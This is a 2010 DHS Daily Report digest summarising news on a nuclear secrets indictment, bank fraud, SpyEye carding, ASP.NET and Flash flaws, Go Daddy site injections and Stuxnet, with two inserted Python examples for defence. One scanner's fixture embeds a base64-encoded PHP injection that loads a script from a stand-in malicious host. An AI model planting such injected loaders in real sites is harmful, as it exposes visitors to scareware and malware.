Tuesday, September 21, 2010

Complete DHS Daily Report for September 21, 2010

Daily Report

Top Stories

 According to the U.S. Department of Justice, a scientist and his wife, who both previously worked as contractors at the Los Alamos National Laboratory in New Mexico, have been indicted on charges of communicating classified nuclear weapons data to a person they believed to be a Venezuelan government official, and conspiring to participate in the development of an atomic weapon for Venezuela. (See item 12)

12. September 17, U.S. Department of Justice – (New Mexico) Former workers at Los Alamos charged with transmitting classified nuclear weapons data. The Justice Department (DOJ) September 17 announced that a scientist and his wife, who both previously worked as contractors at the Los Alamos National Laboratory (LANL) in New Mexico, have been indicted on charges of communicating classified nuclear weapons data to a person they believed to be a Venezuelan government official, and conspiring to participate in the development of an atomic weapon for Venezuela, among other violations. Both defendants were arrested by FBI agents September 17. If convicted of all the charges in the indictment, the defendants face a potential sentence of life in prison. The indictment does not allege that the government of Venezuela or anyone acting on its behalf sought or was passed any classified information, nor does it charge any Venezuelan government officials or anyone acting on their behalf with wrongdoing. Further, the indictment does not charge any individuals currently working at LANL with wrongdoing. According to the indictment, one of the defendants had a series of conversations in March 2008 with an undercover FBI agent posing as a Venezuelan government official. During these conversations, he discussed his program for developing nuclear weapons for Venezuela. Among other things, the suspect allegedly said he could help Venezuela develop a nuclear bomb within 10 years and that, under his program, Venezuela would use a secret, underground nuclear reactor to produce and enrich plutonium, and an open, above-ground reactor to produce nuclear energy. Source: http://www.justice.gov/opa/pr/2010/September/10-nsd-1044.html

 National Public Radio reports that cooler temperatures and calmer and shifting winds have diminished the wildfire threat to 1,600 homes in Herriman, Utah. Several neighborhoods were evacuated September 19 after a wildfire erupted shortly after noon near a machine-gun training range at Camp Williams, a vast military reservation used by the Army National Guard located about 30 miles south of Salt Lake City. (See item 38)

38. September 20, National Public Radio – (Utah) Threat eases from ‘Machine Gun’ wildfire in Utah. Cooler temperatures and calmer and shifting winds have diminished the wildfire threat to 1,600 homes in Herriman, Utah. But fire and police officials continued to keep about 5,000 people out of their homes. Several neighborhoods were evacuated September 19 after a wildfire erupted shortly after noon near a machine-gun training range at Camp Williams, a vast military reservation used by the Army National Guard located about 30 miles south of Salt Lake City. The “Machine Gun” fire was sparked by a stray bullet that likely ricocheted off a rock and into dry brush, said the National Guard commander in Utah. Military firefighters attacked the relatively small blaze and believed it was out, he said. But the region was under a National Weather Service “Red Flag” warning for hot and dry conditions conducive to wildfire and when wind gusts picked up 3 hours later, the blaze flared up from 300 to 3,500 acres, and raced out of control. “It’s the biggest [fire] I’ve seen here,” the National Guard commander said. Training has triggered wildfires in the past, and the National Guard has protocols for conducting training when wildfire is possible. State and county officials promised an investigation. More than 120 National Guard soldiers were activated to assist police and firefighters. Source: http://minnesota.publicradio.org/features/npr.php?id=129986485


Banking and Finance Sector

14. September 20, LoanSafe.org – (New Jersey) Former Chase employee charged in $1.8 Million bank fraud scheme. An indictment was unsealed September 20 against a suspect accused of running a multi-year bank fraud scheme that netted him over $1.8 million between the summer of 2005 and the summer of 2009, a U.S. attorney announced. The suspect was also charged with engaging in transactions over $10,000 with the proceeds of the fraud. The 22-count indictment charges that the suspect, while an employee of JPMorgan Chase Services, manipulated the firm’s internal books and records and caused the bank to wire transfer funds to his account, to accounts of his family, and to accounts in which his life partner had right, title, interest or control. The indictment claims that among the wire transfers of funds was one in 2005 for over $499,500, one in 2008 for $583,444.99, and one in 2009 for another $583,444.99. If convicted, he faces a statutory maximum possible sentence of 240 years in prison, a fine of $6.25 million, $2,200 in special assessments, and up to 5 years’ supervised release. Source: http://www.loansafe.org/former-chase-employee-charged-in-1-8-million-bank-fraud-scheme

15. September 19, WLS 7 Chicago – (Illinois) Hundreds fall victim to ID theft scam. More victims have come forward regarding a case of debit card fraud in Wheeling, Illinois. Hundreds of people lost thousands of dollars, and Chicago police were offering up tips to help protect against scam artists. The story is the same in all the cases: residents used their debit cards at a local business and then noticed large ATM withdrawals from their bank accounts. Consumers in Wheeling and Buffalo Grove were targeted. Police said they are not sure who is responsible for the illegal activity but said all the victims used their debit cards at a local business. Batavia-based national grocery store chain Aldi issued a statement September 17 acknowledging they were recently notified that the security of a limited number of debit card terminals at some stores may have been compromised, and they have removed terminals that may have been affected. The FBI is investigating. Source: http://abclocal.go.com/wls/story?section=news/local&id=7676756

16. September 18, Bank Info Security – (National) 6 Banks closed on Sept. 17. Federal and state banking regulators closed six banks September 17. These failures raise the total number of failed institutions to 140 so far in 2010. ISN Bank, Cherry Hill, New Jersey, was closed by the New Jersey Department of Banking and Insurance, which appointed the Federal Deposit Insurance Corp. (FDIC) as receiver. The FDIC entered into a purchase and assumption agreement with New Century Bank (d.b.a., Customers Bank), Phoenixville, Pennsylvania, to assume all ISN deposits. The cost to the Depositors Insurance Fund (DIF) is estimated to be $23.9 million. The Bank of Ellijay, Ellijay, First Commerce Community Bank, Douglasville, and The Peoples Bank, Winder, were closed by the Georgia Department of Banking and Finance, which appointed FDIC as receiver. Community & Southern Bank, Carrollton, Georgia, acquired the banking operations of all three banks, including all deposits. The FDIC estimates the cost to DIF for Bank of Ellijay will be $55.2 million; for First Commerce Community Bank, $71.4 million; and for The Peoples Bank, $98.9 million. Bramble Savings Bank, Milford, Ohio, was closed by the Ohio Division of Financial Institutions, which appointed the FDIC as receiver. The FDIC entered into a purchase and assumption agreement with Foundation Bank, Cincinnati, to assume all deposits. The cost to DIF is estimated to be $14.6 million. Maritime Savings Bank, West Allis, Wisconsin, was closed by Office of Thrift Supervision, which appointed FDIC as receiver. The FDIC entered into a purchase and assumption agreement with North Shore Bank, FSB, Brookfield, Wisconsin, to assume all Maritime deposits. The cost to the DIF is estimated to be $83.6 million. Source: http://www.bankinfosecurity.com/articles.php?art_id=2932

17. September 18, San Francisco Appeal – (California) Man sentenced in $1.3 million bank fraud scam. One man was sentenced to prison September 15 for participating in a scheme with three others that defrauded banks of more than $1.3 million, according to the U.S. Justice Department. The 46-year-old was ordered to serve 45 months in prison for depositing fraudulent checks from a credit line into bank accounts and then rapidly withdrawing the money from ATMs, a U.S. attorney said in a statement. All four defendants made plea agreements admitting to depositing the phony checks, making withdrawals, and then making purchases before the checks were returned unpaid. The statement said bank accounts became overdrawn by thousands of dollars, and sometimes tens of thousands of dollars. Source: http://sfappeal.com/news/2010/09/man-sentenced-in-13-million-bank-fraud-scam.php

18. September 17, Associated Press – (California) San Francisco man charged in $25M Ponzi scheme. Federal prosecutors said a San Francisco man has been charged with defrauding investors of $25 million in a residential property Ponzi scheme. A U.S. attorney said the 31-year-old suspect allegedly persuaded at least 80 people to lend him money by promising high returns on their investments in properties he would purchase, renovate and resell. FBI investigators allege that instead, early investors were reimbursed with funds from later lenders, while the suspect used some of the proceeds for personal expenses and to invest in retail businesses. The suspect pleaded not guilty during his first court appearance September 17. Source: http://www.sfgate.com/cgi-bin/article.cgi?f=/n/a/2010/09/17/state/n154425D39.DTL

19. September 17, Krebs on Security – (International) SpyEye botnet’s bogus billing feature. Miscreants who control large groupings of hacked PCs or “botnets” are always looking for ways to better monetize their crime machines, and competition among rival bot developers is leading to devious innovations. The SpyEye botnet kit, for example, now not only allows botnet owners to automate the extraction of credit card and other financial data from infected systems, but it also can be configured to use those credentials to generate bogus sales at online stores set up by the botmaster. SpyEye is a software package that promises to make running a botnet a point-and-click exercise. A unique component of SpyEye is a feature called “billinghammer,” which automates the purchase of worthless or copycat software using credit card data stolen from victims of the botnet. The SpyEye author explained this feature in detail on several hacking forums where his kit is sold, even including a video that walks customers through the process of setting it up. Basically, the scam works like this: The botmaster acquires some freeware utility or legitimate program, renames it, claims it as his own and places it up for sale at one of several pre-selected software sales and distribution platforms, including ClickBank, FastSpring, eSellerate, SetSystems, or Shareit. The botmaster then logs in to his SpyEye control panel and feeds it a list of credit card numbers and corresponding cardholder data, after which SpyEye opens an Internet Explorer window and, at user-defined intervals, starts auto-filling the proper fields at the botmaster’s online store and making purchases. Source: http://krebsonsecurity.com/2010/09/spyeye-botnets-bogus-billing-feature/

20. September 17, KWTX 10 Waco – (Texas) FBI seeks public’s help in finding I-35 bandit. The FBI asked for the public’s help September 17 in locating the man dubbed the I-35 Bandit who’s robbed 15 Texas banks between Wichita Falls and San Antonio since January 2004. The most recent robbery occurred September 8 at the First State Bank Central Texas in Little River Academy during the height of flooding in the area caused by heavy rainfall from Tropical Storm Hermine. The robber used a small sedan as a getaway vehicle in all 15 of the robberies, and when he held up the bank in Little River, he was driving a 2011 model Hyundai Sonata that may have been a rental, the FBI said. It appears he has lost weight over the last 2 years, authorities said. The I-35 Bandit should be considered “armed and extremely dangerous,” the FBI said, because in each robbery he entered the bank with his handgun drawn and pointed it directly at tellers or customers. Source: http://www.kwtx.com/news/headlines/103163624.html?ref=624

21. September 17, U.S. Securities and Exchange Commission – (National) Lambros D. Ballas sanctioned. A suspect, of Huntington, New York, was barred from association with any broker or dealer by the U.S. Securities and Exchange Commission (SEC). The sanction was ordered in an administrative proceeding before an administrative law judge, following a court-ordered injunction against him. In July 2010, the suspect was enjoined from violating the antifraud provisions of the federal securities laws based on his involvement in a fraudulent scheme to manipulate stock prices of multiple publicly traded companies. He arranged for the distribution of phony press releases involving major public companies, such as Google, Microsoft, and Walt Disney, and then posed as an investor on Yahoo! Inc. Internet message boards providing links to the bogus releases he had created and disseminated. In the case of one company he touted, the suspect bought 5,000 shares of its stock before issuing a phony press release that caused the stock price to increase nearly 80 percent within a few hours of the fake release. During the time in which he engaged in this conduct, the suspect was a registered representative with a broker-dealer registered with the Commission. Source: http://www.sec.gov/news/digest/2010/dig091710.htm

22. September 16, Wired.com – (California) Man gets 6 years in prison for laundering $2.5 million for carders. A California man who helped funnel stolen cash to a global network of hackers and carders was sentenced September 16 to 6 years in prison for conspiracy to launder money. The 38-year-old suspect, also known as “uBuyWeRush,” ran a legitimate business selling liquidation and overstock merchandise online and from three California stores. But, according to an indictment, he also sold MSR-206’s to carders to encode stolen bank card data onto blank cards, and he served as a conduit to transmit stolen money between mules and carders. He worked with many of the top carders in the criminal underground between 2003 and 2006, including a Ukrainian carder who allegedly worked with the TJX hacker and was considered by authorities to be one of the top sellers of stolen card data on the Internet. In 2003 and 2004, the suspect became an approved and trusted vendor on online criminal forums such as CarderPlanet and Shadowcrew, advertising his goods and services and dispensing advice on the best tools to use for various criminal endeavors. Source: http://www.wired.com/threatlevel/2010/09/ubuywerush/

Information Technology

44. September 20, Computerworld – (International) Adobe moves up Flash fix, will patch bug today. Adobe has accelerated the delivery of a patch for a critical vulnerability in Flash and will ship the fix September 20, rather than next week as originally scheduled. Chrome users, however, got the patch September 17, one of the benefits of an April Google-Adobe deal. The bug, which Adobe acknowledged September 13, can be used by attackers to commandeer machines running the popular media player. According to the US-CERT (United States Computer Emergency Readiness Team) hackers can exploit the vulnerability by enticing users to a malicious Web site, or by getting them to open rigged PDF or Microsoft Word documents. Adobe last week called the ongoing attacks “targeted” and “limited,” and aimed only at Windows users. Security vendors have also unearthed in-the-wild threats leveraging the Flash bug. Source: http://www.computerworld.com/s/article/9186638/Adobe_moves_up_Flash_fix_will_patch_bug_today

45. September 20, The H Security – (International) Workaround for ASP.NET server’s encryption vulnerability. In a security advisory, Microsoft has confirmed the vulnerability in the process used by ASP.NET applications to encrypt cookies and other session information. In the announcement for the security advisory, Microsoft said it was not, so far, aware of any attacks. However, the security group encouraged users to “review the advisory for mitigations and workarounds.” A blog entry describes how to implement the workarounds and offers a script to help administrators determine whether their ASP.NET applications are vulnerable. The cause of the problem was highlighted last week by two security researchers who established that there was an issue with how the ASP.NET framework encrypted data. Usually, this uses the Advanced Encryption Standard (AES) in Cipher Block Chaining mode (CBC), but this mode is vulnerable to what are called Padding Oracle Attacks, which can allow encrypted data, such as cookies, to be decrypted without the key. Source: http://www.h-online.com/security/news/item/Workaround-for-ASP-NET-server-s-encryption-vulnerability-1081837.html
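A padding oracle only exists when the server answers a bad-padding error differently from other errors, so the ASP.NET workaround in Microsoft’s advisory was to configure customErrors to return one identical response for every error. The following checker is an added example (not Microsoft’s script and not from the article) that parses constructed web.config fragments and flags the settings that keep error types distinguishable; the fragments and file names are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed web.config fragments for demonstration (not from the page).
WEAK_CONFIG = """<configuration>
  <system.web>
    <customErrors mode="Off" />
  </system.web>
</configuration>"""

PARTIAL_CONFIG = """<configuration>
  <system.web>
    <customErrors mode="On" defaultRedirect="~/error.aspx">
      <error statusCode="404" redirect="~/notfound.aspx" />
    </customErrors>
  </system.web>
</configuration>"""

HARDENED_CONFIG = """<configuration>
  <system.web>
    <customErrors mode="On" defaultRedirect="~/error.aspx" />
  </system.web>
</configuration>"""


def check_custom_errors(config_xml):
    """Return a list of findings for the <customErrors> element.

    An empty list means every server-side error, including the
    cryptographic exception raised on bad padding, is answered with the
    same redirect, so a remote client cannot tell error types apart.
    """
    findings = []
    root = ET.fromstring(config_xml)
    elem = root.find("./system.web/customErrors")
    if elem is None:
        # ASP.NET defaults to mode="RemoteOnly" with no single error page.
        return ['<customErrors> missing: add mode="On" with a single defaultRedirect']
    mode = elem.get("mode", "RemoteOnly")
    if mode != "On":
        findings.append('customErrors mode is "%s", not "On"' % mode)
    if not elem.get("defaultRedirect"):
        findings.append("no defaultRedirect: errors fall back to the stock ASP.NET error page")
    per_status = elem.findall("error")
    if per_status:
        # Separate pages per status code let a client distinguish error types.
        codes = ", ".join(e.get("statusCode", "?") for e in per_status)
        findings.append("per-status <error> redirects (%s) make error types distinguishable" % codes)
    return findings


def is_hardened(config_xml):
    """True when the customErrors configuration yields uniform error responses."""
    return not check_custom_errors(config_xml)


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("partial", PARTIAL_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, check_custom_errors(cfg) or "OK")
```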

46. September 20, Government Computer News – (International) Apple’s Ping social networking site quickly hit by spammers. Less than 1 week after introducing its new music-oriented social networking site September 1, Apple had to begin scrubbing Ping clean of spammers and scammers who almost immediately began infiltrating the network. Ping was launched as a feature of Apple’s new iTunes 10 music mart. “With Ping, you can follow your favorite artists and friends and join a worldwide conversation with music’s most passionate fans,” Apple’s CEO said in an announcement. He probably was not expecting that within hours, fans also would be swamped with offers for free iPhones, iPads, iPods and other iGoodies from Web site ads, and survey offers in the comments sections of posts on popular artists. “This development does not come as a surprise,” said the vice president of technology strategy at M86 Security. “Ping is a social network and ... cyber criminals have been targeting social networks for quite some time.” The two grand dames of social networking, Twitter and Facebook, have long been spam vectors. But Ping’s online filters were focused more on obscenity and copyright violations than possible spammers. Source: http://gcn.com/articles/2010/09/20/cybereye-box-apple-ping-spammers.aspx

47. September 20, The Register – (International) 4chan launches DDoS against entertainment industry. Members of 4chan launched a series of distributed denial of service attacks (DDoS) against Web sites maintained by the Motion Pictures Association of America and Recording Industry Association of America over the weekend, protesting actions taken against torrent tracker Web site the Pirate Bay. “Operation: Payback Is A [expletive]” began as an attack against Aiplex — an Indian firm that carries out DDoS attacks on Web sites hosting BitTorrent trackers that fail to respond to takedown notices — before progressing onto other entertainment industry Web sites. Packet floods knocked entertainment Web sites offline intermittently throughout the weekend. The attacks were initially coordinated via an Internet Relay Chat channel, which has since been taken offline. Participants in the attacks are invited to download one of two attack tools. It is unclear whether or not participants in the attack are using zombie networks of compromised PCs. Source: http://www.theregister.co.uk/2010/09/20/4chan_ddos_mpaa_riaa/

48. September 18, Softpedia – (International) Sites hosted at Go Daddy hit by mass injection attack again. Researchers from Sucuri Security, a company running a Web integrity monitoring service, warn that a number of Web sites hosted at Go Daddy have had malicious code injected into their pages. All infected sites had base64-encoded JavaScript added to all of their PHP files. The rogue script decodes to an HTML element that loads content from a third-party domain. The external code redirects visitors to a scareware distribution Web site, which mimics an antivirus scan and displays fake warnings about infections on their computers. The goal of the scam is to trick users into buying licenses for a useless application that claims to be able to clean malware that was not even there to begin with. The company provides a generic Web site clean-up script, which according to some comments worked for removing this latest infection. However, affected Web site owners should first check with Go Daddy, as it might already have a solution for this attack. Source: http://news.softpedia.com/news/Sites-Hosted-at-Go-Daddy-Hit-by-Mass-Injection-Attack-Again-156997.shtml
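The injection pattern described above (a base64 blob in every PHP file that decodes to an element pulling content from another domain) can be hunted for offline. This scanner is an added example, not Sucuri’s clean-up script: it decodes long base64 runs found in PHP source and reports those that contain a script or iframe element with a remote src, optionally ignoring the site’s own host. The sample file contents and domain are constructed.

```python
import base64
import binascii
import os
import re
from urllib.parse import urlparse

# Long runs of base64 alphabet; legitimate PHP rarely has 40+ such characters.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# A script/iframe element whose src points at an http(s) URL.
ELEMENT = re.compile(r"<(script|iframe)\b[^>]*\bsrc\s*=\s*['\"]?(https?://[^'\"\s>]+)", re.I)

# Constructed sample: a clean file and one carrying the injected payload.
CLEAN_PHP = '<?php\nrequire "config.php";\necho "<h1>Welcome</h1>";\n'
_PAYLOAD = b'<script src="http://malicious-cdn.example/loader.js"></script>'
INJECTED_PHP = ('<?php echo base64_decode("%s"); ?>\n'
                % base64.b64encode(_PAYLOAD).decode()) + CLEAN_PHP


def find_encoded_elements(php_source, own_host=None):
    """Return hits (offset, tag, src) for base64 blobs that decode to remote elements."""
    hits = []
    for m in B64_RUN.finditer(php_source):
        try:
            decoded = base64.b64decode(m.group(0), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue  # not valid base64 (e.g. bad length); skip
        for e in ELEMENT.finditer(decoded):
            src = e.group(2)
            if own_host and urlparse(src).hostname == own_host:
                continue  # loaded from the site itself, not a third party
            hits.append({"offset": m.start(), "tag": e.group(1).lower(), "src": src})
    return hits


def scan_tree(root_dir, own_host=None):
    """Walk a web root and map each affected .php path to its hits."""
    report = {}
    for dirpath, _, names in os.walk(root_dir):
        for name in names:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                hits = find_encoded_elements(fh.read(), own_host)
            if hits:
                report[path] = hits
    return report


if __name__ == "__main__":
    print("clean:", find_encoded_elements(CLEAN_PHP))
    print("injected:", find_encoded_elements(INJECTED_PHP, own_host="www.example.org"))
```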

49. September 17, DarkReading – (International) Forrester pushes ‘zero trust’ model for security. Trust no one, not even end users: That’s the underlying theme of a new security model proposed by Forrester Research called “Zero Trust,” which calls for enterprises to inspect all network traffic, from the outside and on the inside. A senior analyst with Forrester said the current trust model in security is broken and the only way to fix it is to get rid of the idea of the trusted internal network and the untrusted external network. Instead, consider all network traffic untrusted, he said. “Times have changed. You can’t think about trusted and untrusted users” anymore, said the analyst, who gave more details on the model at Forrester’s Security Forum in Boston, Massachusetts. The wave of damaging insider-borne breaches during the past few years illustrates the importance of being able to see everything going on in the network, he said. Zero Trust means inspecting all traffic in real time, and a new category of products called network analysis and visibility, which combines several niche tools — such as forensics, packet capture, metadata analysis, and network discovery flow analysis — such that they provide visibility and analysis of traffic and do not disrupt business processes. Source: http://www.darkreading.com/insiderthreat/security/perimeter/showArticle.jhtml?articleID=227500145

50. September 17, The H Security – (International) Stuxnet also found at industrial plants in Germany. Siemens is reporting that industrial plants in Germany have also been hit by the Stuxnet worm. According to a spokesperson for Siemens, about one third of the 15 infections discovered at industrial plants worldwide have been found at sites in the German process industry sector. Siemens’ own plants are said not to be affected. Analyses by Siemens have confirmed that Stuxnet can, in theory, manipulate Programmable Logic Controllers (PLCs). However, the behavior has not been observed in the wild. According to the spokesperson, Stuxnet checks the configurations of infected WinCC or PCS 7 systems for existing data blocks. If it finds suitable blocks, it becomes active and modifies the controller code. If it doesn’t find any, it remains inactive. The worm seems to look for specific types of systems to manipulate. Siemens couldn’t provide details about which systems are or could be affected. The spokesperson said no system with an active worm has so far been observed. Automation system security specialists Langner Communications have released a more detailed analysis of how Stuxnet manipulates PLCs on its Web site. According to this analysis, the worm injects arbitrary code when transmitting blocks of code to the PLC. To compromise data transmissions, it diverts the data via a wrapper DLL before submitting it to the SIMATIC Device Operating System’s original s7otbxdx.dll library for processing. Source: http://www.h-online.com/security/news/item/Stuxnet-also-found-at-industrial-plants-in-Germany-1081469.html

Communications Sector

51. September 20, Associated Press – (New Mexico) Water main break leads to Internet outage in Alq. A water main break has shut down Internet and phone service in portions of northwest Albuquerque, New Mexico. Qwest said almost 100 Albuquerque homes and businesses will be without service through September 21. The water main break at a Qwest office near 4th Street and Griegos Road is to blame. A Qwest spokesman said service should be fully restored by the morning of September 21 at the latest. Source: http://www.newswest9.com/Global/story.asp?S=13183405

52. September 18, Binghamton Press & Sun-Bulletin – (New York) Vestal crash takes out Time Warner cable, Internet. Thousands of Time Warner cable and Internet customers were without service for most of the day and night September 18 after a car crash downed a utility pole along Vestal Parkway near Binghamton University in Vestal, New York. Two teenagers were unhurt in the accident, which took place at 11:26 a.m. The accident damaged a Time Warner Cable fiber optics line knocking out cable and Internet service to most neighborhoods west of the crash. Outages were reported in Vestal, Endicott, Endwell and the Town of Union. It is not known how many customers were affected and when their cable service would be restored. Customer service lines to Time Warner in Vestal were continuously busy throughout the day September 18. As many as 12 linemen from Time Warner remained on the scene throughout the day trying to repair the severed fiber optics line that supplies cable television and high-speed Internet services to thousands of customers in the Binghamton region. Source: http://www.pressconnects.com/article/20100918/NEWS01/100918002/1112/Vestal-crash-takes-out-Time-Warner-cable--Internet

53. September 17, United Press International – (International) Rogue satellite still ‘talking’. An uncontrollable satellite drifting in orbit did not shut itself down as predicted and is posing signal interference risk to other satellites, experts said. Intelsat’s Galaxy 15 communications satellite, dubbed the “zombie satellite,” lost contact with its controllers in April but is stuck “on” and continues to transmit signals as its operators on Earth work to avoid potential interference with other nearby spacecraft, SPACE.com reported September 17. Intelsat engineers had estimated that the satellite would lose power and shut itself off in late August, but that has not happened. Intelsat officials said there is no risk of it physically colliding with other spacecraft, so their team’s main focus is preventing Galaxy 15’s signals from interfering with neighboring satellites. The 4,171-pound satellite went rogue April 5 when it stopped responding to controllers on the ground but maintained an active payload, with its telecommunications transmitter still functioning. Several attempts to shut down Galaxy 15 have failed, leaving the defunct satellite stuck drifting in space and still “talking.” Source: http://www.spacemart.com/reports/Rogue_satellite_still_talking_999.html